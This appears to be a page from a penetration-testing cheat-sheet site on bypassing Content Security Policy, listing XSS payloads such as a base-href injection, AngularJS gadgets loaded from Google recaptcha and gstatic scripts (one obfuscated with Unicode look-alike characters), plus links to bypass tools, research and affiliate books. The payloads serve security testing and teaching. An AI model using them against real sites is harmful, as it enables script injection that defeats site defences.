CSP Bypass

CSP Evaluator

CSP Evaluatorcsp-evaluator.withgoogle.com

CSP Bypass

Weak CSP Bypass

1'"--><Base Href=//X55.is?

Credits: @KN0X55

GitHub - renniepak/CSPBypass: CSPBypass.com, a tool designed to help ethical hackers bypass restrictive Content Security Policies (CSP) and exploit XSS (Cross-Site Scripting) vulnerabilities on sites where injections are blocked by CSPs that only allow certain whitelisted domains.GitHub

CSP Bypass Searchcspbypass.com

CSP Bypass for gstatic

<𝚜𝚌𝚛𝚒𝚙𝚝 𝚜𝚛𝚌='//𝚠𝚠𝚠.𝚐𝚜𝚝𝚊𝚝𝚒𝚌.𝚌𝚘𝚖/𝚛𝚎𝚌𝚊𝚙𝚝𝚌𝚑𝚊/𝚊𝚋𝚘𝚞𝚝/𝚓𝚜/𝚖𝚊𝚒𝚗.𝚖𝚒𝚗.𝚓𝚜'></𝚜𝚌𝚛𝚒𝚙𝚝><𝚒𝚗𝚙𝚞𝚝 𝚒𝚍=𝚡 𝚗𝚐-𝚏𝚘𝚌𝚞𝚜=$𝚎𝚟𝚎𝚗𝚝.𝚌𝚘𝚖𝚙𝚘𝚜𝚎𝚍𝙿𝚊𝚝𝚑()|𝚘𝚛𝚍𝚎𝚛𝙱𝚢:'(𝚣=𝚊𝚕𝚎𝚛𝚝)(𝟷)'>

Nuclei Templates

CSP Bypass (DAST) - Nuclei Templates v10.1.5 🎉 — ProjectDiscovery BlogProjectDiscovery

Recaptcha Abuse

<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>

<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>

CSP bypass on PortSwigger.net using Google script resources - Johan CarlssonJohan Carlsson

Form Hijacking to bypass CSP

Using form hijacking to bypass CSPPortSwigger Research

Resources

Page not found - HackTricksbook.hacktricks.xyz

Neatly bypassing CSP ✔️Wallarm

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

PreviousSSI / ESI Injection NextFile Inclusion LFI / RFI

Last updated 5 months ago